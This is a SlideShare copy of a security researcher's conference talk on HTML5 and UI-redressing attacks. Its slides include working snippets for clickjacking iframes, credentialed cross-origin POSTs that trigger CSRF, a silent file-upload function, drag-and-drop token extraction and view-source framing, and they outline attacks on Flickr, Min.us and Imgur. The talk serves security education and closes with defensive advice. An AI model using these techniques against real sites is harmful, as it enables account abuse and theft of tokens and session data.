Download as PDF, PPTX
![Drag out content extraction
$("#iframe").attr('src', 'outer.html’);
$('#dropper').bind('drop', function() {
setTimeout(function() {
var urlmatch = $("#dropper").val()
.match(/token=([a-h0-9]+)$/);
if (urlmatch) {
var token = urlmatch[1];
// do EVIL
}
}, 100);
});
37](https://image.slidesharecdn.com/html5-somethingwickedthiswaycomes-110914134541-phpapp02/75/Html5-something-wicked-this-way-comes-37-2048.jpg)
Uploaded byKrzysztof Kotowicz
Html5: something wicked this way comes
The document discusses the security risks associated with HTML5, particularly focusing on the Same Origin Policy and various attack methods such as clickjacking, cross-origin resource sharing, and silent file uploads. It highlights how user behavior and browser vulnerabilities can be exploited to launch effective attacks, emphasizing the importance of developers implementing security measures like x-frame-options. Overall, it underscores the evolving nature of UI redressing attacks and the need for increased security awareness among users and developers.
More Related Content
![[HEWEBAR 2012] Beyond Desktop Browsing (HTML5)](https://cdn.slidesharecdn.com/ss_thumbnails/hewebar-2012-beyond-desktop-browsing-120729151254-phpapp01-thumbnail.jpg?width=640&height=640&fit=bounds)
![[Poland] It's only about frontend](https://cdn.slidesharecdn.com/ss_thumbnails/owaspeee-151028164034-lva1-app6892-thumbnail.jpg?width=640&height=640&fit=bounds)
Similar to Html5: something wicked this way comes
Html5: something wicked this way comes
- 1. HTML5: Something wicked thisway comes Krzysztof Kotowicz Securing 1
- 2. About me • securityresearcher • HTML 5 • UI redressing / clickjacking • xss-track, squid-imposter, ... • pentester • IT security trainer • „Hacking HTML5” 2
- 3. Plan • Same originpolicy • Exploiting users • Attack gadgets • Wrap-up 3
- 4. Same origin policy •the single most important security concept for the web • restricts communication between websites from different domains • has many flavors • without it hell breaks loose 4
- 5. Same origin policy •can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing • or ignored... • by exploiting users • UI redressing (clickjacking) 5
- 6. Exploiting users Users •Like games • 100 mln play social games //goo.gl/RRWlM • Are not security-savvy 6
- 7. Exploiting users //goo.gl/DgPpY 7
- 8. Combined attacks • Gadgets • HTML5 • UI redressing • Join them • New attacks 8
- 9.
- 10.
- 11. Basic clickjacking 20x20 <iframe> 11
- 12. Basic clickjacking <iframe> -300 -350 20x20 12
- 13. Basic clickjacking <iframe> Victim website 20x20 Like us, plz! 13
- 14. Basic clickjacking <iframe src=outer.html width=20 height=20 scrolling=no style="opacity:0;"></iframe> <!-- outer.html --> <iframe src="//victim" width=5000 height=5000 style="position: absolute; top:-300px; left: -350px;"></iframe> 14
- 15. Basic clickjacking • Trick:Click here to see a video! • User action: click + Any clickable action + Works in every browser - X-Frame-Option - JS framebusting 15
- 16. HTML5 IFRAME sandbox •Used to embed untrusted content • prevents XSS • prevents defacement • Facilitates clickjacking! <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="//victim"></iframe> //html5sec.org/#122 16
- 17. HTML5 IFRAME sandbox +Chrome / Safari / IE 10 + Will disable most JS framebusters - X-Frame-Option 17
- 18. Cross Origin ResourceSharing • HTML5-ish • Cross domain AJAX • With cookies • Blind • Unless the receiving site agrees • Not limited to <form> syntax • Used to trigger CSRF 18
- 19. Cross Origin ResourceSharing var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim", true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.withCredentials = "true"; // send cookies xhr.send("Anything I want"); 19
- 20. Cross Origin ResourceSharing POST / HTTP/1.1 Host: victim Connection: keep-alive Referer: http://dev.localhost/temp/cors.php Content-Length: 15 Origin: http://dev.localhost Content-Type: text/plain ... Cookie: my-cookie=myvalue Anything I want 20
- 21. Silent file upload •File upload purely in Javascript • Silent <input type=file> with any file name and content • Uses CORS • How? Create raw multipart/form-data 21
- 22. Silent file upload functionfileUpload(url, fileData, fileName) { var fileSize = fileData.length, boundary = "xxxxxxxxx", xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.withCredentials = "true"; xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); xhr.setRequestHeader("Content-Length", fileSize); 22
- 23. Silent file upload varbody = " --" + boundary + 'rn Content-Disposition: form-data; name="contents"; filename="' + fileName + '"rn Content-Type: application/octet-streamrn rn ' + fileData + 'rn --' + boundary + '--'; xhr.send(body); 23
- 24. Silent file upload +No user action + No frames + Cross-domain, with cookies + Works in most browsers + You can add more form fields - CSRF flaw needed - No access to response 24
- 25. Silent file upload DEMO Flickr.com 25
- 26. Flickr.com attack toolbox •Remember me • Flickr creates logged session on first request • CSRF file upload • http://up.flickr.com/photos/upload/transfer/ • accepts file uploads • token check skipped 26
- 27. Drag into • Putattackers content into victim form 27
- 28. Drag into DEMO Alphabet Hero 28
- 29. Drag into • Trick:Put paper in the can! • User action: drag & drop, click + Inject arbitrary content + Trigger self-XSS - Firefox only - X-Frame-Option - JS framebusting 29
- 30. Drag into Self-XSSin real life: • wordpress 0-day (Jelmer de Hen) //goo.gl/dNYi5 • chronme.com (sneaked.net) //goo.gl/hs7Bw • Google Code vulns (Amol Naik) //goo.gl/NxKFY 30
- 31. Drag out contentextraction image image 31
- 32. Drag out contentextraction image victim <iframe> image 32
- 33. Drag out contentextraction image victim <iframe> textarea <textarea> 33
- 34. Drag out contentextraction <div id=game style="position:relative"> <img style="position:absolute;..." src="paper.png" /> <img style="position:absolute;..." src="trash.png" /> <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe> <textarea style="position:absolute; opacity:0;..." id=dropper></textarea> </div> 34
- 35. Drag out contentextraction 35
- 36. Drag out contentextraction 36
- 37. Drag out contentextraction $("#iframe").attr('src', 'outer.html’); $('#dropper').bind('drop', function() { setTimeout(function() { var urlmatch = $("#dropper").val() .match(/token=([a-h0-9]+)$/); if (urlmatch) { var token = urlmatch[1]; // do EVIL } }, 100); }); 37
- 38. Drag out contentextraction • Trick: Put paper in the can! • User action: drag & drop + Access sensitive content cross domain - Firefox only - X-Frame-Option - JS framebusting 38
- 39. Drag out contentextraction DEMO Min.us 39
- 40. Min.us attack toolbox •CORS to create gallery • social engineering • extract gallery editor-id from <a href> • silent file upload to gallery • CORS change gallery to public • HTML5 + UI redressing combined! 40
- 41. View-source • Display HTMLsource in frame • session IDs • tokens • private data <iframe src="view-source:view-source:http://victim" width=5000 height=5000 style="position: absolute; top: -300px; left: -150px;"> </iframe> 41
- 42. View-source 42
- 43. View-source 43
- 44. View-source • Trick: Yourserial number is... • User action: select + drag & drop, copy-paste + Beats JS framebusting + Already earned $500 from Facebook - X-Frame-Options - Firefox only - Complicated user action 44
- 45. View-source DEMO Imgur.com 45
- 46. Imgur.com attack toolbox •framed view-source: • captcha-like string (AdSense ID) • session ID • social engineering: • trick to copy/paste page source • Exploitation: • http://api.imgur.com • cookie auth, no IP limits for session 46
- 47. Summary • UI redressingattacks are improving • HTML5 helps exploiting vulnerabilities • Users can be a weak link too! Devs: Use X-Frame-Options: DENY 47
- 48. Links • html5sec.org • code.google.com/p/html5security •www.contextis.co.uk/research/white-papers/ clickjacking • blog.kotowicz.net • github.com/koto Twitter: @kkotowicz kkotowicz@securing.pl 48
- 49.